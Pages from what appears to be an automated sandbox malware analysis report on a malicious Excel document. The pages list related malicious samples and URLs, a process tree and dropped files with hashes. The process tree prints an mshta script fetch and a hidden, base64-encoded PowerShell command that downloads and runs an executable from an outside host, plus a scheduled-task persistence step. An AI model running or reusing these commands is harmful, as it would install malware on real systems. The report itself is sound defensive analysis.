Match Associated Sample Name / URL SHA 256 Detection Link Context 54328bd36c14bd82ddaa0c04b25ed9ad copy-Inv. doc 20191126_91654.xls Get hash malicious Browse 45.55.57.244 #Uc190#Uc775 #Ubd84#Uc11d #Ub0b4#Uc6a9_2 Get hash malicious Browse 45.55.57.244 6_November_2019.doc SCAN_November_2019.doc Get hash malicious Browse 45.55.57.244 bitmainantminer.filmko.info/wp- Get hash malicious Browse 45.55.57.244 admin/PgCOTmQbizotGmxUCYOquZJqkqcgTO/ bitmainantminer.filmko.info/wp- Get hash malicious Browse 45.55.57.244 admin/PgCOTmQbizotGmxUCYOquZJqkqcgTO/ manhattanportage.com.tw/wp- Get hash malicious Browse 45.55.57.244 content/themes/emilio/ia1oowqlvf12fiwpa86hxkwt9hwzni48c8i d/ https://anril.cf/8a56/ZBmVvsbnpZWhCCikncOAlaSfl/ Get hash malicious Browse 45.55.57.244 0291108-892261.xls Get hash malicious Browse 45.55.57.244 0224014-429068.xls Get hash malicious Browse 45.55.57.244 s.exe Get hash malicious Browse 45.55.57.244 message 2019_11_20 90351.doc Get hash malicious Browse 45.55.57.244 dati DX_65738.doc Get hash malicious Browse 45.55.57.244 JigsawRansomware.exe Get hash malicious Browse 45.55.57.244 DwnldShdl.exe Get hash malicious Browse 45.55.57.244 3269_06227.doc Get hash malicious Browse 45.55.57.244 4450733197.doc Get hash malicious Browse 45.55.57.244 securefiless-001-site1.ftempurl.com/639474.zip Get hash malicious Browse 45.55.57.244 FACT. 7-7-73904167.doc Get hash malicious Browse 45.55.57.244

Dropped Files

No context

Screenshots

Thumbnails This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Copyright Joe Security LLC 2019 Page 16 of 67 Startup

Copyright Joe Security LLC 2019 Page 17 of 67 System is w10x64 EXCEL.EXE (PID: 3896 cmdline: 'C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE' /automation -Embedding MD5: D672D26C85AEB9536B9736BF04054969) rundll32.exe (PID: 2752 cmdline: rUNDlL32.eXe SHELL32.DLL,ShellExec_RunDLL mSHta.Exe VbsCripT:CLOSe (geTObJEct ('SCRipT:https://jplymell.com/serb.xml') ) MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D) mshta.exe (PID: 5072 cmdline: 'C:\Windows\system32\mSHta.Exe' VbsCripT:CLOSe (geTObJEct ('SCRipT:https://jplymell.com/serb.xml') ) MD5: 7083239CE743FDB68DFC933B7308E80A) cmd.exe (PID: 980 cmdline: 'C:\Windows\system32\cmd.exe' '/c pOweRsHeLL.Exe -eX uNRestRictED -Nop -W HiDDEn -ec IAAJACAAIAAJACAACQAgACAACQAJACAAIAAgAAkAIAAJAAkAUwBFAHQALQBjAG8AbgB0AGUAbgBUACAACQAJAAkACQAJAAkACQAJAAkACQAtAFYAYQAgA CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACgAIAAgACAACQAJAC4AKABDAE8AbQBNAGEATgBEACAAbgBlAHcALQBPAEIAagBFAGMAVAApA AkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAATgBlAFQALgBXAGUAQgBjAEwAaQBlAE4AVAAJACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA CAAIAAgACAAIAAgACAACQApAC4ARABPAFcAbgBsAG8AQQBkAGQAQQB0AEEAKAAgACAAIAAJAB0gaAB0AHQAcABzADoALwAvAGoAcABsAHkAbQB lAGwAbAAuAGMAbwBtAC8AcgBvAG8AdAB3AGUAYgAvAGEAcABwAGwAZQBwAGUAZwAuAGoAcABnAB0gCQAgACAAIAAgACAAIAAgACAAIAAgAAkAK QAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAtAEUAbgAgACAACQAJACAACQAgACAACQAgAAkACQAJAEIAeQB0AGUAIAAgACAAIAAgACAAIAAgACAAI AAgACAAIAAgACAAIAAgACAAIAAgAAkALQBwAGEAdABoACAACQAJAAkACQAJAAkACQAJAB0gJABFAG4AVgA6AGwATwBjAGEATABBAFAAUABkAGE AdABhAFwAUwBpAGwAdgBlAHAAdQByAGkAdAB5AC4AZQB4AGUAHSAgACAAIAA7AAkAIAAJACAACQAgAAkACQAJAAkACQAJACAACQAgACAAIABJA G4AdgBPAEsARQAtAGUAeABwAHIAZQBzAHMASQBvAE4AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAB0gJABlAE4AVgA6AGwAbwBjA GEATABBAHAAcABEAGEAdABBAFwAUwBpAGwAdgBlAHAAdQByAGkAdAB5AC4AZQB4AGUAHSA= ' MD5: F3BDBE3BB6F734E357235F4D5898582D) conhost.exe (PID: 4384 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) powershell.exe (PID: 4500 cmdline: pOweRsHeLL.Exe -eX uNRestRictED -Nop -W HiDDEn -ec IAAJACAAIAAJACAA CQAgACAACQAJACAAIAAgAAkAIAAJAAkAUwBFAHQALQBjAG8AbgB0AGUAbgBUACAACQAJAAkACQAJAAkACQAJAAkACQAtAFYAYQAgACAAIAAgAC AAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACgAIAAgACAACQAJAC4AKABDAE8AbQBNAGEATgBEACAAbgBlAHcALQBPAEIAagBFAGMAVAAp AAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJACAATgBlAFQALgBXAGUAQgBjAEwAaQBlAE4AVAAJACAAIAAgACAAIAAgACAAIAAgACAAIA AgACAAIAAgACAAIAAgACAAIAAgACAACQApAC4ARABPAFcAbgBsAG8AQQBkAGQAQQB0AEEAKAAgACAAIAAJAB0gaAB0AHQAcABzADoALwAvAGoA cABsAHkAbQBlAGwAbAAuAGMAbwBtAC8AcgBvAG8AdAB3AGUAYgAvAGEAcABwAGwAZQBwAGUAZwAuAGoAcABnAB0gCQAgACAAIAAgACAAIAAgAC AAIAAgAAkAKQAgAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkAIAAtAEUAbgAgACAACQAJACAACQAgACAACQAgAAkACQAJAEIAeQB0AGUAIAAg ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAkALQBwAGEAdABoACAACQAJAAkACQAJAAkACQAJAB0gJABFAG4AVgA6AGwATw BjAGEATABBAFAAUABkAGEAdABhAFwAUwBpAGwAdgBlAHAAdQByAGkAdAB5AC4AZQB4AGUAHSAgACAAIAA7AAkAIAAJACAACQAgAAkACQAJAAkA CQAJACAACQAgACAAIABJAG4AdgBPAEsARQAtAGUAeABwAHIAZQBzAHMASQBvAE4AIAAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAAkACQAJAA kACQAJAB0gJABlAE4AVgA6AGwAbwBjAGEATABBAHAAcABEAGEAdABBAFwAUwBpAGwAdgBlAHAAdQByAGkAdAB5AC4AZQB4AGUAHSA= ' MD5: DBA3E6449E97D4E3DF64527EF7012A10) Silvepurity.exe (PID: 2816 cmdline: C:\Users\user\AppData\Local\Silvepurity.exe MD5: 243C81F2A749C38B3C4318ED77AC8001) schtasks.exe (PID: 1728 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tjInWEsrJITP' /XML 'C:\Users\user\AppData\Local\Temp\t mpB5CB.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04) conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) Silvepurity.exe (PID: 4264 cmdline: C:\Users\user\AppData\Local\Silvepurity.exe MD5: 243C81F2A749C38B3C4318ED77AC8001) cleanup

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\Silvepurity.exe.log Process: C:\Users\user\AppData\Local\Silvepurity.exe File Type: ASCII text, with CRLF line terminators Size (bytes): 655 Entropy (8bit): 5.242666464794316 Encrypted: false MD5: BB2F7221C5B3CAAA16A10F5D73D66647 SHA1: F31B352B6CEA48265696E667462EF104B6CAFBD2 SHA-256: 0206A436411AF0F119836DFFF3AE9695D2F0DD6600F411BD4E8E78130509B59F SHA-512: CAA168ECE4D5A2365CD357BD2B05CC796A8F73F9DD14EC1ED90A5BD2E3FA1A3A3A445CD2A6B40F9590F689C8F58B8CACEAE426558CAD46D80F846F0B74326 639 Malicious: false Reputation: moderate, very likely benign file Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\d72bdddce94cd6438f15999de0b0afb6\System.ni.dll",0..3,"C:\Windows\assembly \NativeImages_v2.0.50727_32\System.Drawing\49235fda2a08f24faad85fb3459473ea\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_3 2\Microsoft.VisualBas#\2c2c76fa2618c73769de74395defcb73\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Mana gement\de48966e0cee99c51fd157e946ff9c4d\System.Management.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\10e08475dc 461c7289efd159e9f0e339\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\770487D9-02FE-47E0-A0E7-708B7933C2FB Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators Size (bytes): 113928 Entropy (8bit): 5.3782317445628385 Encrypted: false MD5: FCEC6A64339741F1811294765184D718 SHA1: C91CC0D4016F7802530C03E801B658E54F821DC5 SHA-256: FC924722912EF6095D57A9623B82889952A250E59D7326E35EFEE91264311D67 SHA-512: 5115D826DFDE33904E913F3B2E6C2813F341F527C1C3BA670ED202AFD84D747215AC69A9E1F9F7793B1FC793DE00472F19542C5597F407EFCC658956F24655CB Malicious: false Reputation: low

Copyright Joe Security LLC 2019 Page 18 of 67 C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\770487D9-02FE-47E0-A0E7-708B7933C2FB Preview: .... .. Build: 16.0.12321.30526-->.. .. .. .. .. https://rr.office.microsoft.com/research/query.asmx.. .. .. https://o15.officeredir.microsoft.com/r.. .. .. https://o15.officeredir.microsoft.com/r.. .. .. https://[MAX.BaseHost]/client/results.. .. .. https://[MAX.BaseHost]/client/results.. .. .. https://ocsa.office.microsoft.com/client/15/help/template.. ..

C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File Type: XML 1.0 document, ASCII text, with very long lines, with no line terminators Size (bytes): 309906 Entropy (8bit): 5.17741396832073 Encrypted: false MD5: B14444FCD0C2B45E2C7086D10B4B7A64 SHA1: 0C3F6E8601E37A51B1CB825E2709DEDC04EF9D58 SHA-256: EB7E7EE2EF4F5EBD1957F0915522181446C9EE776140822DDA82207A8E2B3881 SHA-512: E33E68A8B57B4E638FE19A31FA89FD5ABE8F9F36EECC11A752FD5C75C5A15781BC81113CCAC55B3287B1E2544F6B538E638B79218BEAA230AE770C8D90AA70 D9 Malicious: false Reputation: low Preview:

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File Type: SQLite 3.x database, last written using SQLite version 3019003 Size (bytes): 4096 Entropy (8bit): 0.09237477444559435 Encrypted: false MD5: 1A9A28416CE9CCB568FC28191B8B1267 SHA1: 49BD37DCB1210C3DCDACE52393537FA0197EC14F SHA-256: 9B8EC34DF5486C537505C5B582CD27519C114BE8EB58098E1C6F7DCCDF63C617 SHA-512: 516998D8F0639272541EF5DFE99EF0B73281F320CB6014AEDF96E5D415DA301CED8E1ADF38A7514D3279BE9B850A2C3F8D21A385C03F520351AAAF4FD693AAB A Malicious: false Reputation: high, very likely benign file Preview: SQLite format 3...... @ ......

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-journal Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File Type: data Size (bytes): 524 Entropy (8bit): 0.27937671757176796 Encrypted: false MD5: 8BE17DD40BBFCED8FD480EE5F97669DC SHA1: BBDA4B53D5E620D49A92FC1ACF73CF1B73B592C5 SHA-256: D9ADCACD9966152DB59570B2B90C3731B0CED1699F769D9D92CFF5DEE4247C3B SHA-512: F572960536E46BA558B45E2B22812F93C31C91FBC02E57F1E3F46947A838B29CB7677B8CFCEDB63B48C857D467516BCB2FD43A2108FA4F42783F9907B743E3D4 Malicious: false Preview: ...... U...... c.....

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File Type: SQLite Write-Ahead Log, version 3007000 Size (bytes): 37112 Entropy (8bit): 0.403099554755285 Encrypted: false

Copyright Joe Security LLC 2019 Page 19 of 67 C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal MD5: 33AACAD59A8CF7718CBE1EA7E20D2740 SHA1: 949AAF497D78EA90E878E49BB8061ABC185A3AF4 SHA-256: DF00453A004BEDE9CFC5638E4F0A361F2AEB3B147F4E65DF4F823AB2E2BF4403 SHA-512: E59C6C32B0B2ED67629E3E596130CD7FD98C0FF32940C18DB3A4B04F9E6B5E1A818DF0DDE5411E43894C0A44728CCCC0F8D1C4B19319919382878D65A84F414D Malicious: false Preview: 7....-...... g|.O...... qo.TI.SQLite format 3...... @ ......

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File Type: SQLite 3.x database, last written using SQLite version 3019003 Size (bytes): 61440 Entropy (8bit): 0.45380896434419704 Encrypted: false MD5: 23E9B199B44AAB9ADC5C04ED7CDAD285 SHA1: 1B182AF2857B1B80E9FC1F50655834896A5CBD56 SHA-256: 9EA99074DF8591346344DAC6CDFD65D5DEDBD1E4BAD02CD2A58FBF338CD2E100 SHA-512: 3142E0D6948B9BDE3399109CE46B0F6B5E121F70399BA66360D1E4CFB06411BA80B091BE9AE46EED9796DADD9FEB36548FBC72BFBD05CDF302F03B9DB3A77B 41 Malicious: false Preview: SQLite format 3...... @ ......

C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.session-journal Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File Type: data Size (bytes): 44184 Entropy (8bit): 0.4750025192437787 Encrypted: false MD5: 2C6E2BEAB3924067C101AEF2A0A64B33 SHA1: 58C5A19D1625A7D6C60694864AC8A9E0C54437F5 SHA-256: 61AFE35E8391BA1FE47957F41AFCAFABC369D9008ED146065A9C4D44A2FDA420 SHA-512: 9E296A7EB406FA5406B15B7FA0B82C750AFBABE0FD359DF7BF44FBAE67BF7CF40F24E526B5E209B1E48C12B7AC0EB0F75BC42BAAE4C5EE38C6D2D48F1FA42 0A6 Malicious: false Preview: ...... Yg)...... c...... oYj......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\598669F3.jpg Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File Type: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 712x473, frames 3 Size (bytes): 26463 Entropy (8bit): 7.788417674458919 Encrypted: false MD5: D73892D40A40A79173BDFB8F15233896 SHA1: A8001583A114EECDF3F8BDF228282FE31D21205E SHA-256: F078FDEA04C4ECFECA5B3B56257FEDB2BA57633CD032DDDA1918D395AABC383D SHA-512: 07F412E464C2364688A5AA953806BDB6AF9242F863DAF1C96C7C2E6D741DAE35D6D2B3B2AA4CD17BB795663CAAE5C7174AD5CAFAF23B2649339D7324B95505D 1 Malicious: false Preview: ...... JFIF...... C...... C...... "...... @...... !1..AQ...... "2BR Saq...... $4C..3b.#%5...... 1.!."...... ?...... hc0...E...:.{...... h.7.P...:.b..+.W...... S..1..V.Cu..|.a...h.U.....V.\....y..|...j...=...... y../.a.y..|...... ^jp...~ .W.^...... n....^j...?.y.....:...,. 9W../...)...!..[u...*.S..0.<.a...i.l.!e....a..z.5Xo...U.Cu...a..z..S..1..V.Cu..|..~.z..U..1.u][email protected]...<[email protected]_5x_...uM.7P...V...... <.aW. ...T.\....*.U...... [email protected]...|[email protected]...<[email protected]...<..~.z.[u...).Q..1.<..~.z.[u...)[email protected][email protected]_...<..~.z.Wu...).S..1...N..G..[ u...*.S..1.<[email protected]...*}...0..<[email protected]_...<[email protected]..?h.U.....U.Cur..>..?..../..C.n.Cu..|....h.S..1..V.Cu

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6A10AB79.tmp

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File Type: Microsoft Excel 2007+ Size (bytes): 39016

Copyright Joe Security LLC 2019 Page 20 of 67 C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6A10AB79.tmp

Entropy (8bit): 7.943402047473203 Encrypted: false MD5: AC9CFCC82AF323CC0C17DE432C1A3B7D SHA1: 8F6DEBAA24AD9A5330D316F29AE94BEF2EDD5323 SHA-256: F2FE7D16A4205AEEB8E0FBB09BAEA9E0D8CA55D26EC03DFBDF694BD2CAD3D106 SHA-512: 8923BC7111EE2EDA82D4206E07803B977D455AF04D170FD8B76046DDE4846823CE87FDC8E3B6D3F2CCF957566B67EFB28B5F7FE8DEE12B687168E61ED2B695E 6 Malicious: true Antivirus: Antivirus: Joe Sandbox ML, Detection: 100% Preview: PK..-...... !.`r...... [Content_Types].xml...... T.N.0..#....(v..B...X..p...... 1.}..$...6...... 3cO.w[..f.14.ZND.AGcC...... @0.b.F.....b..KH...5bYJ....%z ....,b.P.3.*.^C...dr.t ..C.K.!f._..WW..-o.N.6..~....)9..pXm....XX.r3...W..P..V..Bf}gf..=.I.0..?...h...... HF.9....8.B.9...=.afk.z.\...,.u.-..<....... e..<..Md.q...T_PK..-...... !.79.`...... xl/workbook.xml....X...... v...... U]o.8.}_i...a.\l.$.MG|j#..N.}.4r.)V.3...... $..C.....8...s...m.G&....&g.XW..w.s.....lKi.U.....OL.....|#..^...... }.8..YK..Y.+K![...... %.....m...NKyg.."....\.e.\...;.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\6A10AB79.tmp:Zone.Identifier

Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE File Type: ASCII text, with CRLF line terminators Size (bytes): 26 Entropy (8bit): 3.95006375643621 Encrypted: false MD5: 187F488E27DB4AF347237FE461A079AD SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64 SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309 SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E Malicious: true Preview: [ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\serb[1].xml Process: C:\Windows\SysWOW64\mshta.exe File Type: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators Size (bytes): 2023 Entropy (8bit): 4.973425220253087 Encrypted: false MD5: B409BA3B666DA2B4D5AA271682C62890 SHA1: 63B74A339F85E4A98976EBA3E4A93393ED61D72C SHA-256: 08267A7C2EC07C35C76FFDE5E4EFA763DAC2AD6706B9B9DFEF67DB85745DE5EC SHA-512: E7B79316D9CF5124200A05F2EC297CEA25A630C5A2E667ACA406193510E49808A3BA0BE572378106CBC159DD71CAAE2DFFC140FA836967D2E308428AFBB8AD0 7 Malicious: false Yara Hits: Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\serb[1].xml, Author: Florian Roth Preview: ......